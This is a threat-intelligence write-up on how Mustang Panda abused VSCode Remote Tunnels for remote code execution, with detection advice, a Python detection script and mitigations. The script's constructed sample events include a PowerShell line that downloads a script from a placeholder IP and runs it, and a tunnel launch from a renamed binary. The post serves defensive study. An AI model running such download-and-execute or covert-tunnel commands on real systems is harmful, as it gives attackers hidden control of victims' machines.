Exploiting VSCode Remote Tunnels for Remote Code Execution on Victim's Machine

What are Remote Tunnels?

Concept of Remote Tunnels

Remote Tunnels is a feature built into Microsoft VSCode. It lets a user reach a remote machine, such as a desktop or virtual machine (VM), through a tunnel brokered by Microsoft's tunnel service, so the machine never has to expose SSH or any other inbound port. The user can then connect to that machine from a VS Code client or a browser anywhere.

How Remote Tunnels Work

For example, when a user wants to reach the coding environment on their company computer, they enable Remote Tunnels in VSCode (or start one from the `code` CLI) on that machine and sign in with a GitHub or Microsoft account. The tool then prints a URL. The user opens that URL in a web browser, authenticates with the same account, and gets the local coding environment of that machine (if they have been granted permission). Users can also grant colleagues access to the tunnel so they can connect to the same environment.

How are Remote Tunnels Abused?

Recently, abuse of VSCode Remote Tunnels has been on the rise, and several threat groups have used the feature in their campaigns.

Initially, a malicious script or LNK file is sent to the victim. It checks whether VSCode is installed and, if not, silently downloads the CLI build of VSCode. It then starts a remote tunnel, creating a covert access channel from the victim's computer, through Microsoft's tunnel relay, to the attacker's browser or VS Code client. The tunnel is registered to the attacker's own account, so the victim never sees a login prompt.

Technical Analysis

We will use a campaign conducted by Mustang Panda (also known as Stately Taurus) as an example for analysis.

Attack Chain Analysis

[Figure: Infection chain for remote tunnels]

The attack chain of the campaign goes through the following steps:

  1. Send the victim a malicious LNK file, such as update.py.

  2. The LNK file carries a PowerShell command that downloads a Python script from a remote IP address and runs it.

  3. The Python script downloads the CLI build of VSCode (Code Insiders), whose binary is code-insiders.exe, and runs it.

  4. The Python script creates a VSCode tunnel with the CLI and authenticates it to GitHub.

  5. The VSCode remote tunnel is established.

  6. The attacker opens the tunnel from a web browser and executes commands on the victim's machine.

Executing the LNK File

The LNK file will contain a simple PowerShell command that downloads a Python script from a web server and executes the script.

[Figure: PowerShell command to download and run Python]

Executing the Python Script

The Python script downloads the CLI binary for the Code Insiders build of VSCode. It then starts a tunnel and captures the authentication link and device code that the CLI prints.

[Figure: VSCode remote tunnel setup script]

Connecting to the Tunnel

The Python script sends the GitHub device code back to the attacker, who enters it at https://github.com/login/device. This step is trivial for the attacker: the tunnel is authenticated to the attacker's own GitHub account, not the victim's, so no credential from the victim is needed.

[Figure: GitHub authentication for VSCode remote tunnels]

The attacker then needs to allow the tunnel to connect to their account.

[Figure: GitHub device authentication for VSCode remote tunnels]

After authenticating, the attacker sees the list of remote hosts registered to that account and can connect to the victim's machine.

[Figure: Remote tunnel host]

The attacker can now browse the victim's file system through the VSCode file explorer.

[Figure: Browsing the victim's directories through the VSCode remote tunnel]

Finally, they can create new files and scripts on the host and run them from the integrated terminal, which amounts to full remote code execution.

Conclusion

In summary, the Remote Tunnels feature of VSCode is extremely powerful and, in an attacker's hands, gives remote code execution on the victim's machine over an outbound connection to a trusted Microsoft domain. The most alarming aspect is that all of this starts with a single LNK file sent to the user.

How to Detect VSCode Remote Tunnel

PowerShell Execution

Abuse of VSCode Remote Tunnels can be detected by monitoring LNK execution that spawns PowerShell to download and run a Python script.

The PowerShell command line can be filtered further for parameters such as Invoke-WebRequest (and its aliases iwr, curl and wget), -OutFile, and python.

Setting Up VSCode Tunnel

Attackers often rename the code.exe or code-insiders.exe file on the system, so searching for malicious behavior by file name is quite meaningless.

Therefore, detection must key on behaviour the attacker cannot change, such as passing the --accept-server-license-terms parameter on the command line. Without this parameter the CLI stops to ask the user to accept the server license, so an attacker running the tunnel non-interactively has to pass it.

Script Execution

System administrators need to monitor processes related to PowerShell, especially when it launches tools like Python.

Additionally, monitoring command line parameters can help detect abnormal behaviors, such as using strange parameters or scripts from unknown sources.

Network Connections

The main domain used by the VSCode tunnel relay is:

global.rel.tunnels.api.visualstudio.com

Blocking this domain in the organization prevents tunnels from being established. Note that the relay also uses regional hosts under *.rel.tunnels.api.visualstudio.com and the tunnel service uses *.devtunnels.ms, so block the wildcard, not only the one name. Other domains used as part of a VSCode tunnel include:

URL/Domain | Description
https://code.visualstudio.com/sha/download?build=stable&os=cli-alpine-x64 | VSCode CLI download (stable build, Alpine x64)
https://code.visualstudio.com/sha/download?build=insider&os=cli-win32-x64 | Code Insiders CLI download (Windows x64)
vscode.dev | VSCode browser session
insiders.vscode.dev | Code Insiders browser session
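The detection points above, both the process-creation rules (PowerShell download to python, python spawned by PowerShell, the tunnel started with --accept-server-license-terms under any file name) and the domain list, written out as Python that runs over Sysmon-style events. This is an added example, not code from the article or from the campaign. The sample events, the 203.0.113.10 address, the user name, the temp paths, the renamed binary name and the regional relay hostname are all constructed for the example, and the rule names are the example's own.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events using Sysmon Event ID 1 (process creation) field
# names. They are written for this example and are not logs from the campaign;
# the IP address, user name and temp paths are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",               # LNK double-clicked in Explorer
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/update.py '
                    r'-OutFile $env:TEMP\update.py; python $env:TEMP\update.py"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\victim\AppData\Local\Programs\Python\Python311\python.exe",
     "CommandLine": r"python C:\Users\victim\AppData\Local\Temp\update.py"},
    {"ParentImage": r"C:\Users\victim\AppData\Local\Programs\Python\Python311\python.exe",
     "Image": r"C:\Users\victim\AppData\Local\Temp\svchost.exe",   # renamed code-insiders.exe
     "CommandLine": r"svchost.exe tunnel --accept-server-license-terms --name dev"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",           # a developer starting a tunnel themselves
     "Image": r"C:\Program Files\Microsoft VS Code\bin\code.exe",
     "CommandLine": r"code.exe tunnel --accept-server-license-terms"},
    {"ParentImage": r"C:\Windows\explorer.exe",               # ordinary editor launch, benign
     "Image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\app'},
]

# Constructed Sysmon Event ID 22 (DNS query) names; the "euw" host is a made-up
# instance of the *.rel.tunnels.api.visualstudio.com regional pattern.
SAMPLE_DNS = [
    "global.rel.tunnels.api.visualstudio.com",
    "euw.rel.tunnels.api.visualstudio.com",
    "update.example.com",
]

# Relay and browser endpoints named in the article. code.visualstudio.com is
# left out on purpose: it also serves legitimate VS Code downloads.
TUNNEL_DOMAINS = {
    "global.rel.tunnels.api.visualstudio.com",
    "vscode.dev",
    "insiders.vscode.dev",
}
# Regional relay hosts hang off these suffixes, so match the suffix, not one name.
TUNNEL_SUFFIXES = (".rel.tunnels.api.visualstudio.com", ".devtunnels.ms")

TUNNEL_BINARIES = {"code.exe", "code-insiders.exe"}
LICENSE_FLAG = "--accept-server-license-terms"
# iwr, curl and wget are PowerShell aliases of Invoke-WebRequest.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\b(?:iwr|curl|wget)\b", re.I)
OUTFILE_RE = re.compile(r"-outfile\b", re.I)
PYTHON_RE = re.compile(r"\bpython(?:3|w)?(?:\.exe)?\b", re.I)
TUNNEL_RE = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the rule names a process-creation event triggers ([] if none)."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    hits = []
    # LNK stage: PowerShell that downloads to disk and hands off to python.
    if (image == "powershell.exe" and DOWNLOAD_RE.search(cmd)
            and OUTFILE_RE.search(cmd) and PYTHON_RE.search(cmd)):
        hits.append("powershell_downloads_and_runs_python")
    # Script stage: python spawned by PowerShell rather than by a dev tool.
    if parent == "powershell.exe" and image.startswith("python"):
        hits.append("powershell_spawned_python")
    # Tunnel stage: keyed on the command line, because the binary gets renamed.
    if TUNNEL_RE.search(cmd) and LICENSE_FLAG in cmd.lower():
        hits.append("vscode_tunnel_started")
        if image not in TUNNEL_BINARIES:
            hits.append("vscode_cli_renamed")
    return hits


def is_tunnel_domain(name):
    """True for the relay or browser endpoints a VSCode tunnel talks to."""
    name = name.lower().rstrip(".")
    return name in TUNNEL_DOMAINS or name.endswith(TUNNEL_SUFFIXES)


def scan(events, dns_queries):
    """Run all rules and return (rule, detail) pairs in input order."""
    findings = [(rule, e["CommandLine"]) for e in events for rule in classify(e)]
    findings += [("tunnel_relay_dns", q) for q in dns_queries if is_tunnel_domain(q)]
    return findings


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS, SAMPLE_DNS):
        print(f"[{rule}] {detail}")
```

The tunnel rule deliberately ignores the image name and fires on the `tunnel` subcommand plus the license flag, then adds a second, higher-confidence hit when the image is not code.exe or code-insiders.exe; a developer's own `code.exe tunnel` produces only the first hit, which keeps the renamed-binary case distinguishable from legitimate use. The DNS check matches the relay suffix rather than the single global name, since a block or alert on global.rel.tunnels.api.visualstudio.com alone misses the regional relay hosts.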

Recommendations

FPT Threat Intelligence recommends that organizations and individuals take the following measures against this campaign:

  • Disable anonymous tunnel access: do not allow tunnels that can be reached without authentication.

  • Disable Dev Tunnels: deny all Dev Tunnels commands except the handful needed for housekeeping (unset, echo, ping, and user).

  • Allow only listed Microsoft Entra tenant IDs: only users authenticated against a tenant on the allowlist may use Dev Tunnels.

Written by Tran Hoang Phong

Just a SOC Analyst ^^